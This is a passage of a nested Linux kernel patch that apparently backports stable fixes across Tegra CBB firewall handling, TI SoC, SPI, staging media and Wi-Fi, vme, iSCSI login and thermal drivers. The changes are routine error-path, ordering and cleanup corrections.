++	}
++
+ 	if (!strcmp(cbb->fabric->errors[cbb->type].code, "TIMEOUT_ERR")) {
+ 		tegra234_lookup_slave_timeout(file, cbb, slave_id, fab_id);
+ 		return;
+@@ -517,7 +584,7 @@ static irqreturn_t tegra234_cbb_isr(int irq, void *data)
+ 		u32 status = tegra_cbb_get_status(cbb);
+ 
+ 		if (status && (irq == priv->sec_irq)) {
+-			tegra_cbb_print_err(NULL, "CPU:%d, Error: %s@%llx, irq=%d\n",
++			tegra_cbb_print_err(NULL, "CPU:%d, Error: %s@0x%llx, irq=%d\n",
+ 					    smp_processor_id(), priv->fabric->name,
+ 					    priv->res->start, irq);
+ 
+@@ -525,14 +592,14 @@ static irqreturn_t tegra234_cbb_isr(int irq, void *data)
+ 			if (err)
+ 				goto unlock;
+ 
+-			mstr_id =  FIELD_GET(USRBITS_MSTR_ID, priv->mn_user_bits);
+-
+ 			/*
+-			 * If illegal request is from CCPLEX(id:0x1) master then call BUG() to
+-			 * crash system.
++			 * If illegal request is from CCPLEX(id:0x1) master then call WARN()
+ 			 */
+-			if ((mstr_id == 0x1) && priv->fabric->off_mask_erd)
+-				is_inband_err = 1;
++			if (priv->fabric->off_mask_erd) {
++				mstr_id =  FIELD_GET(USRBITS_MSTR_ID, priv->mn_user_bits);
++				if (mstr_id == CCPLEX_MSTRID)
++					is_inband_err = 1;
++			}
+ 		}
+ 	}
+ 
+@@ -640,8 +707,13 @@ static const struct tegra234_cbb_fabric tegra234_aon_fabric = {
+ 	.name = "aon-fabric",
+ 	.master_id = tegra234_master_id,
+ 	.slave_map = tegra234_aon_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_aon_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x17000,
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x8d0,
++	.firewall_wr_ctl = 0x8c8,
+ };
+ 
+ static const struct tegra234_slave_lookup tegra234_bpmp_slave_map[] = {
+@@ -656,8 +728,13 @@ static const struct tegra234_cbb_fabric tegra234_bpmp_fabric = {
+ 	.name = "bpmp-fabric",
+ 	.master_id = tegra234_master_id,
+ 	.slave_map = tegra234_bpmp_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_bpmp_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x19000,
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x8f0,
++	.firewall_wr_ctl = 0x8e8,
+ };
+ 
+ static const struct tegra234_slave_lookup tegra234_cbb_slave_map[] = {
+@@ -728,55 +805,62 @@ static const struct tegra234_cbb_fabric tegra234_cbb_fabric = {
+ 	.name = "cbb-fabric",
+ 	.master_id = tegra234_master_id,
+ 	.slave_map = tegra234_cbb_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_cbb_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x60000,
+-	.off_mask_erd = 0x3a004
++	.off_mask_erd = 0x3a004,
++	.firewall_base = 0x10000,
++	.firewall_ctl = 0x23f0,
++	.firewall_wr_ctl = 0x23e8,
+ };
+ 
+-static const struct tegra234_slave_lookup tegra234_dce_slave_map[] = {
++static const struct tegra234_slave_lookup tegra234_common_slave_map[] = {
+ 	{ "AXI2APB", 0x00000 },
+ 	{ "AST0",    0x15000 },
+ 	{ "AST1",    0x16000 },
++	{ "CBB",     0x17000 },
++	{ "RSVD",    0x00000 },
+ 	{ "CPU",     0x18000 },
+ };
+ 
+ static const struct tegra234_cbb_fabric tegra234_dce_fabric = {
+ 	.name = "dce-fabric",
+ 	.master_id = tegra234_master_id,
+-	.slave_map = tegra234_dce_slave_map,
++	.slave_map = tegra234_common_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_common_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x19000,
+-};
+-
+-static const struct tegra234_slave_lookup tegra234_rce_slave_map[] = {
+-	{ "AXI2APB", 0x00000 },
+-	{ "AST0",    0x15000 },
+-	{ "AST1",    0x16000 },
+-	{ "CPU",     0x18000 },
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x290,
++	.firewall_wr_ctl = 0x288,
+ };
+ 
+ static const struct tegra234_cbb_fabric tegra234_rce_fabric = {
+ 	.name = "rce-fabric",
+ 	.master_id = tegra234_master_id,
+-	.slave_map = tegra234_rce_slave_map,
++	.slave_map = tegra234_common_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_common_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x19000,
+-};
+-
+-static const struct tegra234_slave_lookup tegra234_sce_slave_map[] = {
+-	{ "AXI2APB", 0x00000 },
+-	{ "AST0",    0x15000 },
+-	{ "AST1",    0x16000 },
+-	{ "CBB",     0x17000 },
+-	{ "CPU",     0x18000 },
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x290,
++	.firewall_wr_ctl = 0x288,
+ };
+ 
+ static const struct tegra234_cbb_fabric tegra234_sce_fabric = {
+ 	.name = "sce-fabric",
+ 	.master_id = tegra234_master_id,
+-	.slave_map = tegra234_sce_slave_map,
++	.slave_map = tegra234_common_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra234_common_slave_map),
+ 	.errors = tegra234_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra234_cbb_errors),
+ 	.notifier_offset = 0x19000,
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x290,
++	.firewall_wr_ctl = 0x288,
+ };
+ 
+ static const char * const tegra241_master_id[] = {
+@@ -889,7 +973,7 @@ static const struct tegra_cbb_error tegra241_cbb_errors[] = {
+ };
+ 
+ static const struct tegra234_slave_lookup tegra241_cbb_slave_map[] = {
+-	{ "CCPLEX",     0x50000 },
++	{ "RSVD",       0x00000 },
+ 	{ "PCIE_C8",    0x51000 },
+ 	{ "PCIE_C9",    0x52000 },
+ 	{ "RSVD",       0x00000 },
+@@ -942,20 +1026,30 @@ static const struct tegra234_slave_lookup tegra241_cbb_slave_map[] = {
+ 	{ "PCIE_C3",    0x58000 },
+ 	{ "PCIE_C0",    0x59000 },
+ 	{ "PCIE_C1",    0x5a000 },
++	{ "CCPLEX",     0x50000 },
+ 	{ "AXI2APB_29", 0x85000 },
+ 	{ "AXI2APB_30", 0x86000 },
++	{ "CBB_CENTRAL", 0x00000 },
++	{ "AXI2APB_31", 0x8E000 },
++	{ "AXI2APB_32", 0x8F000 },
+ };
+ 
+ static const struct tegra234_cbb_fabric tegra241_cbb_fabric = {
+ 	.name = "cbb-fabric",
+ 	.master_id = tegra241_master_id,
+ 	.slave_map = tegra241_cbb_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra241_cbb_slave_map),
+ 	.errors = tegra241_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra241_cbb_errors),
+ 	.notifier_offset = 0x60000,
+ 	.off_mask_erd = 0x40004,
++	.firewall_base = 0x20000,
++	.firewall_ctl = 0x2370,
++	.firewall_wr_ctl = 0x2368,
+ };
+ 
+ static const struct tegra234_slave_lookup tegra241_bpmp_slave_map[] = {
++	{ "RSVD",    0x00000 },
+ 	{ "RSVD",    0x00000 },
+ 	{ "RSVD",    0x00000 },
+ 	{ "CBB",     0x15000 },
+@@ -969,8 +1063,13 @@ static const struct tegra234_cbb_fabric tegra241_bpmp_fabric = {
+ 	.name = "bpmp-fabric",
+ 	.master_id = tegra241_master_id,
+ 	.slave_map = tegra241_bpmp_slave_map,
++	.max_slaves = ARRAY_SIZE(tegra241_bpmp_slave_map),
+ 	.errors = tegra241_cbb_errors,
++	.max_errors = ARRAY_SIZE(tegra241_cbb_errors),
+ 	.notifier_offset = 0x19000,
++	.firewall_base = 0x30000,
++	.firewall_ctl = 0x8f0,
++	.firewall_wr_ctl = 0x8e8,
+ };
+ 
+ static const struct of_device_id tegra234_cbb_dt_ids[] = {
+@@ -1055,6 +1154,15 @@ static int tegra234_cbb_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, cbb);
+ 
++	/*
++	 * Don't enable error reporting for a Fabric if write to it's registers
++	 * is blocked by CBB firewall.
++	 */
++	if (!tegra234_cbb_write_access_allowed(pdev, cbb)) {
++		dev_info(&pdev->dev, "error reporting not enabled due to firewall\n");
++		return 0;
++	}
++
+ 	spin_lock_irqsave(&cbb_lock, flags);
+ 	list_add(&cbb->base.node, &cbb_list);
+ 	spin_unlock_irqrestore(&cbb_lock, flags);
+diff --git a/drivers/soc/ti/knav_qmss_queue.c b/drivers/soc/ti/knav_qmss_queue.c
+index 92af7d1b6f5bd..8fb76908be704 100644
+--- a/drivers/soc/ti/knav_qmss_queue.c
++++ b/drivers/soc/ti/knav_qmss_queue.c
+@@ -67,7 +67,7 @@ static DEFINE_MUTEX(knav_dev_lock);
+  * Newest followed by older ones. Search is done from start of the array
+  * until a firmware file is found.
+  */
+-const char *knav_acc_firmwares[] = {"ks2_qmss_pdsp_acc48.bin"};
++static const char * const knav_acc_firmwares[] = {"ks2_qmss_pdsp_acc48.bin"};
+ 
+ static bool device_ready;
+ bool knav_qmss_device_ready(void)
+@@ -1785,6 +1785,7 @@ static int knav_queue_probe(struct platform_device *pdev)
+ 	pm_runtime_enable(&pdev->dev);
+ 	ret = pm_runtime_resume_and_get(&pdev->dev);
+ 	if (ret < 0) {
++		pm_runtime_disable(&pdev->dev);
+ 		dev_err(dev, "Failed to enable QMSS\n");
+ 		return ret;
+ 	}
+diff --git a/drivers/soc/ti/smartreflex.c b/drivers/soc/ti/smartreflex.c
+index ad2bb72e640c8..6a389a6444f36 100644
+--- a/drivers/soc/ti/smartreflex.c
++++ b/drivers/soc/ti/smartreflex.c
+@@ -932,6 +932,7 @@ static int omap_sr_probe(struct platform_device *pdev)
+ err_debugfs:
+ 	debugfs_remove_recursive(sr_info->dbg_dir);
+ err_list_del:
++	pm_runtime_disable(&pdev->dev);
+ 	list_del(&sr_info->node);
+ 	clk_unprepare(sr_info->fck);
+ 
+diff --git a/drivers/spi/spi-fsl-spi.c b/drivers/spi/spi-fsl-spi.c
+index 731624f157fc0..93152144fd2ec 100644
+--- a/drivers/spi/spi-fsl-spi.c
++++ b/drivers/spi/spi-fsl-spi.c
+@@ -333,13 +333,26 @@ static int fsl_spi_prepare_message(struct spi_controller *ctlr,
+ {
+ 	struct mpc8xxx_spi *mpc8xxx_spi = spi_controller_get_devdata(ctlr);
+ 	struct spi_transfer *t;
++	struct spi_transfer *first;
++
++	first = list_first_entry(&m->transfers, struct spi_transfer,
++				 transfer_list);
+ 
+ 	/*
+ 	 * In CPU mode, optimize large byte transfers to use larger
+ 	 * bits_per_word values to reduce number of interrupts taken.
++	 *
++	 * Some glitches can appear on the SPI clock when the mode changes.
++	 * Check that there is no speed change during the transfer and set it up
++	 * now to change the mode without having a chip-select asserted.
+ 	 */
+-	if (!(mpc8xxx_spi->flags & SPI_CPM_MODE)) {
+-		list_for_each_entry(t, &m->transfers, transfer_list) {
++	list_for_each_entry(t, &m->transfers, transfer_list) {
++		if (t->speed_hz != first->speed_hz) {
++			dev_err(&m->spi->dev,
++				"speed_hz cannot change during message.\n");
++			return -EINVAL;
++		}
++		if (!(mpc8xxx_spi->flags & SPI_CPM_MODE)) {
+ 			if (t->len < 256 || t->bits_per_word != 8)
+ 				continue;
+ 			if ((t->len & 3) == 0)
+@@ -348,7 +361,7 @@ static int fsl_spi_prepare_message(struct spi_controller *ctlr,
+ 				t->bits_per_word = 16;
+ 		}
+ 	}
+-	return 0;
++	return fsl_spi_setup_transfer(m->spi, first);
+ }
+ 
+ static int fsl_spi_transfer_one(struct spi_controller *controller,
+diff --git a/drivers/spi/spi-gpio.c b/drivers/spi/spi-gpio.c
+index 4b12c4964a664..9c8c7948044ed 100644
+--- a/drivers/spi/spi-gpio.c
++++ b/drivers/spi/spi-gpio.c
+@@ -268,9 +268,19 @@ static int spi_gpio_set_direction(struct spi_device *spi, bool output)
+ 	if (output)
+ 		return gpiod_direction_output(spi_gpio->mosi, 1);
+ 
+-	ret = gpiod_direction_input(spi_gpio->mosi);
+-	if (ret)
+-		return ret;
++	/*
++	 * Only change MOSI to an input if using 3WIRE mode.
++	 * Otherwise, MOSI could be left floating if there is
++	 * no pull resistor connected to the I/O pin, or could
++	 * be left logic high if there is a pull-up. Transmitting
++	 * logic high when only clocking MISO data in can put some
++	 * SPI devices in to a bad state.
++	 */
++	if (spi->mode & SPI_3WIRE) {
++		ret = gpiod_direction_input(spi_gpio->mosi);
++		if (ret)
++			return ret;
++	}
+ 	/*
+ 	 * Send a turnaround high impedance cycle when switching
+ 	 * from output to input. Theoretically there should be
+diff --git a/drivers/spi/spidev.c b/drivers/spi/spidev.c
+index b2775d82d2d7b..6313e7d0cdf87 100644
+--- a/drivers/spi/spidev.c
++++ b/drivers/spi/spidev.c
+@@ -377,12 +377,23 @@ spidev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
+ 	switch (cmd) {
+ 	/* read requests */
+ 	case SPI_IOC_RD_MODE:
+-		retval = put_user(spi->mode & SPI_MODE_MASK,
+-					(__u8 __user *)arg);
+-		break;
+ 	case SPI_IOC_RD_MODE32:
+-		retval = put_user(spi->mode & SPI_MODE_MASK,
+-					(__u32 __user *)arg);
++		tmp = spi->mode;
++
++		{
++			struct spi_controller *ctlr = spi->controller;
++
++			if (ctlr->use_gpio_descriptors && ctlr->cs_gpiods &&
++			    ctlr->cs_gpiods[spi->chip_select])
++				tmp &= ~SPI_CS_HIGH;
++		}
++
++		if (cmd == SPI_IOC_RD_MODE)
++			retval = put_user(tmp & SPI_MODE_MASK,
++					  (__u8 __user *)arg);
++		else
++			retval = put_user(tmp & SPI_MODE_MASK,
++					  (__u32 __user *)arg);
+ 		break;
+ 	case SPI_IOC_RD_LSB_FIRST:
+ 		retval = put_user((spi->mode & SPI_LSB_FIRST) ?  1 : 0,
+diff --git a/drivers/staging/media/deprecated/stkwebcam/Kconfig b/drivers/staging/media/deprecated/stkwebcam/Kconfig
+index 4450403dff41f..7234498e634ac 100644
+--- a/drivers/staging/media/deprecated/stkwebcam/Kconfig
++++ b/drivers/staging/media/deprecated/stkwebcam/Kconfig
+@@ -2,7 +2,7 @@
+ config VIDEO_STKWEBCAM
+ 	tristate "USB Syntek DC1125 Camera support (DEPRECATED)"
+ 	depends on VIDEO_DEV
+-	depends on USB
++	depends on MEDIA_USB_SUPPORT && MEDIA_CAMERA_SUPPORT
+ 	help
+ 	  Say Y here if you want to use this type of camera.
+ 	  Supported devices are typically found in some Asus laptops,
+diff --git a/drivers/staging/media/imx/imx7-media-csi.c b/drivers/staging/media/imx/imx7-media-csi.c
+index e5b550ccfa22d..c77401f184d74 100644
+--- a/drivers/staging/media/imx/imx7-media-csi.c
++++ b/drivers/staging/media/imx/imx7-media-csi.c
+@@ -521,9 +521,9 @@ static void imx7_csi_configure(struct imx7_csi *csi)
+ 	cr18 = imx7_csi_reg_read(csi, CSI_CSICR18);
+ 
+ 	cr18 &= ~(BIT_CSI_HW_ENABLE | BIT_MIPI_DATA_FORMAT_MASK |
+-		  BIT_DATA_FROM_MIPI | BIT_BASEADDR_CHG_ERR_EN |
+-		  BIT_BASEADDR_SWITCH_EN | BIT_BASEADDR_SWITCH_SEL |
+-		  BIT_DEINTERLACE_EN);
++		  BIT_DATA_FROM_MIPI | BIT_MIPI_DOUBLE_CMPNT |
++		  BIT_BASEADDR_CHG_ERR_EN | BIT_BASEADDR_SWITCH_SEL |
++		  BIT_BASEADDR_SWITCH_EN | BIT_DEINTERLACE_EN);
+ 
+ 	if (out_pix->field == V4L2_FIELD_INTERLACED) {
+ 		cr18 |= BIT_DEINTERLACE_EN;
+diff --git a/drivers/staging/media/rkvdec/rkvdec-vp9.c b/drivers/staging/media/rkvdec/rkvdec-vp9.c
+index d8c1c0db15c70..cfae99b40ccb4 100644
+--- a/drivers/staging/media/rkvdec/rkvdec-vp9.c
++++ b/drivers/staging/media/rkvdec/rkvdec-vp9.c
+@@ -84,6 +84,8 @@ struct rkvdec_vp9_probs {
+ 		struct rkvdec_vp9_inter_frame_probs inter;
+ 		struct rkvdec_vp9_intra_only_frame_probs intra_only;
+ 	};
++	/* 128 bit alignment */
++	u8 padding1[11];
+ };
+ 
+ /* Data structure describing auxiliary buffer format. */
+@@ -1006,6 +1008,7 @@ static int rkvdec_vp9_start(struct rkvdec_ctx *ctx)
+ 
+ 	ctx->priv = vp9_ctx;
+ 
++	BUILD_BUG_ON(sizeof(priv_tbl->probs) % 16); /* ensure probs size is 128-bit aligned */
+ 	priv_tbl = dma_alloc_coherent(rkvdec->dev, sizeof(*priv_tbl),
+ 				      &vp9_ctx->priv_tbl.dma, GFP_KERNEL);
+ 	if (!priv_tbl) {
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus_h265.c b/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
+index 4952fc17f3e6d..625f77a8c5bde 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
++++ b/drivers/staging/media/sunxi/cedrus/cedrus_h265.c
+@@ -242,6 +242,18 @@ static void cedrus_h265_skip_bits(struct cedrus_dev *dev, int num)
+ 	}
+ }
+ 
++static u32 cedrus_h265_show_bits(struct cedrus_dev *dev, int num)
++{
++	cedrus_write(dev, VE_DEC_H265_TRIGGER,
++		     VE_DEC_H265_TRIGGER_SHOW_BITS |
++		     VE_DEC_H265_TRIGGER_TYPE_N_BITS(num));
++
++	cedrus_wait_for(dev, VE_DEC_H265_STATUS,
++			VE_DEC_H265_STATUS_VLD_BUSY);
++
++	return cedrus_read(dev, VE_DEC_H265_BITS_READ);
++}
++
+ static void cedrus_h265_write_scaling_list(struct cedrus_ctx *ctx,
+ 					   struct cedrus_run *run)
+ {
+@@ -406,7 +418,7 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 	u32 num_entry_point_offsets;
+ 	u32 output_pic_list_index;
+ 	u32 pic_order_cnt[2];
+-	u8 *padding;
++	u8 padding;
+ 	int count;
+ 	u32 reg;
+ 
+@@ -520,21 +532,22 @@ static int cedrus_h265_setup(struct cedrus_ctx *ctx, struct cedrus_run *run)
+ 	if (slice_params->data_byte_offset == 0)
+ 		return -EOPNOTSUPP;
+ 
+-	padding = (u8 *)vb2_plane_vaddr(&run->src->vb2_buf, 0) +
+-		slice_params->data_byte_offset - 1;
++	cedrus_h265_skip_bits(dev, (slice_params->data_byte_offset - 1) * 8);
++
++	padding = cedrus_h265_show_bits(dev, 8);
+ 
+ 	/* at least one bit must be set in that byte */
+-	if (*padding == 0)
++	if (padding == 0)
+ 		return -EINVAL;
+ 
+ 	for (count = 0; count < 8; count++)
+-		if (*padding & (1 << count))
++		if (padding & (1 << count))
+ 			break;
+ 
+ 	/* Include the one bit. */
+ 	count++;
+ 
+-	cedrus_h265_skip_bits(dev, slice_params->data_byte_offset * 8 - count);
++	cedrus_h265_skip_bits(dev, 8 - count);
+ 
+ 	/* Bitstream parameters. */
+ 
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus_regs.h b/drivers/staging/media/sunxi/cedrus/cedrus_regs.h
+index d81f7513ade0d..655c05b389cf5 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus_regs.h
++++ b/drivers/staging/media/sunxi/cedrus/cedrus_regs.h
+@@ -505,6 +505,8 @@
+ #define VE_DEC_H265_LOW_ADDR_ENTRY_POINTS_BUF(a) \
+ 	SHIFT_AND_MASK_BITS(a, 7, 0)
+ 
++#define VE_DEC_H265_BITS_READ			(VE_ENGINE_DEC_H265 + 0xdc)
++
+ #define VE_DEC_H265_SRAM_OFFSET			(VE_ENGINE_DEC_H265 + 0xe0)
+ 
+ #define VE_DEC_H265_SRAM_OFFSET_PRED_WEIGHT_LUMA_L0	0x00
+diff --git a/drivers/staging/r8188eu/core/rtw_pwrctrl.c b/drivers/staging/r8188eu/core/rtw_pwrctrl.c
+index 870d81735b8dc..5290ac36f08c1 100644
+--- a/drivers/staging/r8188eu/core/rtw_pwrctrl.c
++++ b/drivers/staging/r8188eu/core/rtw_pwrctrl.c
+@@ -273,7 +273,7 @@ static s32 LPS_RF_ON_check(struct adapter *padapter, u32 delay_ms)
+ 			err = -1;
+ 			break;
+ 		}
+-		msleep(1);
++		mdelay(1);
+ 	}
+ 
+ 	return err;
+diff --git a/drivers/staging/rtl8192e/rtllib_rx.c b/drivers/staging/rtl8192e/rtllib_rx.c
+index 46d75e925ee9b..f710eb2a95f3a 100644
+--- a/drivers/staging/rtl8192e/rtllib_rx.c
++++ b/drivers/staging/rtl8192e/rtllib_rx.c
+@@ -1489,9 +1489,9 @@ static int rtllib_rx_Monitor(struct rtllib_device *ieee, struct sk_buff *skb,
+ 		hdrlen += 4;
+ 	}
+ 
+-	rtllib_monitor_rx(ieee, skb, rx_stats, hdrlen);
+ 	ieee->stats.rx_packets++;
+ 	ieee->stats.rx_bytes += skb->len;
++	rtllib_monitor_rx(ieee, skb, rx_stats, hdrlen);
+ 
+ 	return 1;
+ }
+diff --git a/drivers/staging/rtl8192u/ieee80211/ieee80211_rx.c b/drivers/staging/rtl8192u/ieee80211/ieee80211_rx.c
+index b58e75932ecd5..3686b3c599ce7 100644
+--- a/drivers/staging/rtl8192u/ieee80211/ieee80211_rx.c
++++ b/drivers/staging/rtl8192u/ieee80211/ieee80211_rx.c
+@@ -951,9 +951,11 @@ int ieee80211_rx(struct ieee80211_device *ieee, struct sk_buff *skb,
+ #endif
+ 
+ 	if (ieee->iw_mode == IW_MODE_MONITOR) {
++		unsigned int len = skb->len;
++
+ 		ieee80211_monitor_rx(ieee, skb, rx_stats);
+ 		stats->rx_packets++;
+-		stats->rx_bytes += skb->len;
++		stats->rx_bytes += len;
+ 		return 1;
+ 	}
+ 
+diff --git a/drivers/staging/vme_user/vme_fake.c b/drivers/staging/vme_user/vme_fake.c
+index dd646b0c531d4..1ee432c223e2b 100644
+--- a/drivers/staging/vme_user/vme_fake.c
++++ b/drivers/staging/vme_user/vme_fake.c
+@@ -1073,6 +1073,8 @@ static int __init fake_init(void)
+ 
+ 	/* We need a fake parent device */
+ 	vme_root = __root_device_register("vme", THIS_MODULE);
++	if (IS_ERR(vme_root))
++		return PTR_ERR(vme_root);
+ 
+ 	/* If we want to support more than one bridge at some point, we need to
+ 	 * dynamically allocate this so we get one per device.
+diff --git a/drivers/staging/vme_user/vme_tsi148.c b/drivers/staging/vme_user/vme_tsi148.c
+index 020e0b3bce64b..0171f46d1848f 100644
+--- a/drivers/staging/vme_user/vme_tsi148.c
++++ b/drivers/staging/vme_user/vme_tsi148.c
+@@ -1751,6 +1751,7 @@ static int tsi148_dma_list_add(struct vme_dma_list *list,
+ 	return 0;
+ 
+ err_dma:
++	list_del(&entry->list);
+ err_dest:
+ err_source:
+ err_align:
+diff --git a/drivers/target/iscsi/iscsi_target_nego.c b/drivers/target/iscsi/iscsi_target_nego.c
+index f2919319ad383..ff49c8f3fe241 100644
+--- a/drivers/target/iscsi/iscsi_target_nego.c
++++ b/drivers/target/iscsi/iscsi_target_nego.c
+@@ -1018,6 +1018,13 @@ static int iscsi_target_handle_csg_one(struct iscsit_conn *conn, struct iscsi_lo
+ 	return 0;
+ }
+ 
++/*
++ * RETURN VALUE:
++ *
++ *  1 = Login successful
++ * -1 = Login failed
++ *  0 = More PDU exchanges required
++ */
+ static int iscsi_target_do_login(struct iscsit_conn *conn, struct iscsi_login *login)
+ {
+ 	int pdu_count = 0;
+@@ -1363,12 +1370,13 @@ int iscsi_target_start_negotiation(
+ 		ret = -1;
+ 
+ 	if (ret < 0) {
+-		cancel_delayed_work_sync(&conn->login_work);
+ 		iscsi_target_restore_sock_callbacks(conn);
+ 		iscsi_remove_failed_auth_entry(conn);
+ 	}
+-	if (ret != 0)
++	if (ret != 0) {
++		cancel_delayed_work_sync(&conn->login_work);
+ 		iscsi_target_nego_release(conn);
++	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/thermal/imx8mm_thermal.c b/drivers/thermal/imx8mm_thermal.c
+index e2c2673025a7a..258d988b266d7 100644
+--- a/drivers/thermal/imx8mm_thermal.c
++++ b/drivers/thermal/imx8mm_thermal.c
+@@ -65,8 +65,14 @@ static int imx8mm_tmu_get_temp(void *data, int *temp)
+ 	u32 val;
+ 
+ 	val = readl_relaxed(tmu->base + TRITSR) & TRITSR_TEMP0_VAL_MASK;
++
++	/*
++	 * Do not validate against the V bit (bit 31) due to errata
++	 * ERR051272: TMU: Bit 31 of registers TMU_TSCR/TMU_TRITSR/TMU_TRATSR invalid
++	 */
++
+ 	*temp = val * 1000;
+-	if (*temp < VER1_TEMP_LOW_LIMIT)
++	if (*temp < VER1_TEMP_LOW_LIMIT || *temp > VER2_TEMP_HIGH_LIMIT)
+ 		return -EAGAIN;
+ 
+ 	return 0;
+diff --git a/drivers/thermal/k3_j72xx_bandgap.c b/drivers/thermal/k3_j72xx_bandgap.c
+index 16b6bcf1bf4fa..c073b1023bbe7 100644
+--- a/drivers/thermal/k3_j72xx_bandgap.c
++++ b/drivers/thermal/k3_j72xx_bandgap.c
+@@ -439,7 +439,7 @@ static int k3_j72xx_bandgap_probe(struct platform_device *pdev)
+ 		workaround_needed = false;
+ 
+ 	dev_dbg(bgp->dev, "Work around %sneeded\n",
+-		workaround_needed ? "not " : "");
++		workaround_needed ? "" : "not ");
+ 
+ 	if (!workaround_needed)
+ 		init_table(5, ref_table, golden_factors);
+diff --git a/drivers/thermal/qcom/lmh.c b/drivers/thermal/qcom/lmh.c
+index d3d9b9fa49e81..4122a51e98741 100644
+--- a/drivers/thermal/qcom/lmh.c
++++ b/drivers/thermal/qcom/lmh.c
+@@ -45,7 +45,7 @@ static irqreturn_t lmh_handle_irq(int hw_irq, void *data)
+ 	if (irq)
+ 		generic_handle_irq(irq);
+ 
+-	return 0;
++	return IRQ_HANDLED;
+ }
+ 
+ static void lmh_enable_interrupt(struct irq_data *d)
+diff --git a/drivers/thermal/qcom/qcom-spmi-temp-alarm.c b/drivers/thermal/qcom/qcom-spmi-temp-alarm.c
+index be785ab37e53d..ad84978109e6f 100644
+--- a/drivers/thermal/qcom/qcom-spmi-temp-alarm.c
++++ b/drivers/thermal/qcom/qcom-spmi-temp-alarm.c
+@@ -252,7 +252,8 @@ static int qpnp_tm_update_critical_trip_temp(struct qpnp_tm_chip *chip,
+ 			disable_s2_shutdown = true;
+ 		else
+ 			dev_warn(chip->dev,
+-				 "No ADC is configured and critical temperature is above the maximum stage 2 threshold of 140 C! Configuring stage 2 shutdown at 140 C.\n");
++				 "No ADC is configured and critical temperature %d mC is above the maximum stage 2 threshold of %ld mC! Configuring stage 2 shutdown at %ld mC.\n",
++				 temp, stage2_threshold_max, stage2_threshold_max);
+ 	}
+ 
+ skip:
+diff --git a/drivers/thermal/thermal_core.c b/drivers/thermal/thermal_core.c
+index 117eeaf7dd241..615fdda3a5de7 100644
+--- a/drivers/thermal/thermal_core.c
++++ b/drivers/thermal/thermal_core.c
+@@ -883,10 +883,6 @@ __thermal_cooling_device_register(struct device_node *np,
+ 	cdev->id = ret;
+ 	id = ret;
+ 
+-	ret = dev_set_name(&cdev->device, "cooling_device%d", cdev->id);
+-	if (ret)
+-		goto out_ida_remove;
+-
+ 	cdev->type = kstrdup(type ? type : "", GFP_KERNEL);
+ 	if (!cdev->type) {
+ 		ret = -ENOMEM;
+@@ -901,6 +897,11 @@ __thermal_cooling_device_register(struct device_node *np,
+ 	cdev->device.class = &thermal_class;
+ 	cdev->devdata = devdata;
+ 	thermal_cooling_device_setup_sysfs(cdev);
++	ret = dev_set_name(&cdev->device, "cooling_device%d", cdev->id);
++	if (ret) {
++		thermal_cooling_device_destroy_sysfs(cdev);
++		goto out_kfree_type;
++	}
+ 	ret = device_register(&cdev->device);
+ 	if (ret)
+ 		goto out_kfree_type;
+@@ -1234,10 +1235,6 @@ thermal_zone_device_register_with_trips(const char *type, struct thermal_trip *t
+ 	tz->id = id;
+ 	strscpy(tz->type, type, sizeof(tz->type));
+ 
+-	result = dev_set_name(&tz->device, "thermal_zone%d", tz->id);
+-	if (result)
+-		goto remove_id;
+-
+ 	if (!ops->critical)
+ 		ops->critical = thermal_zone_device_critical;
+ 
+@@ -1260,6 +1257,11 @@ thermal_zone_device_register_with_trips(const char *type, struct thermal_trip *t
+ 	/* A new thermal zone needs to be updated anyway. */
+ 	atomic_set(&tz->need_update, 1);
+ 
++	result = dev_set_name(&tz->device, "thermal_zone%d", tz->id);
++	if (result) {
++		thermal_zone_destroy_device_groups(tz);
++		goto remove_id;
++	}
+ 	result = device_register(&tz->device);
+ 	if (result)
+ 		goto release_device;
+diff --git a/drivers/thermal/thermal_helpers.c b/drivers/thermal/thermal_helpers.c
+index c65cdce8f856e..fca0b23570f96 100644
+--- a/drivers/thermal/thermal_helpers.c
++++ b/drivers/thermal/thermal_helpers.c
+@@ -115,7 +115,12 @@ int thermal_zone_get_temp(struct thermal_zone_device *tz, int *temp)
+ 	int ret;
+ 
+ 	mutex_lock(&tz->lock);
+-	ret = __thermal_zone_get_temp(tz, temp);
++
++	if (device_is_registered(&tz->device))
++		ret = __thermal_zone_get_temp(tz, temp);
++	else
++		ret = -ENODEV;
++
+ 	mutex_unlock(&tz->lock);
+ 
+ 	return ret;
+diff --git a/drivers/thermal/thermal_of.c b/drivers/thermal/thermal_of.c
+index d4b6335ace15f..aacba30bc10c1 100644
+--- a/drivers/thermal/thermal_of.c
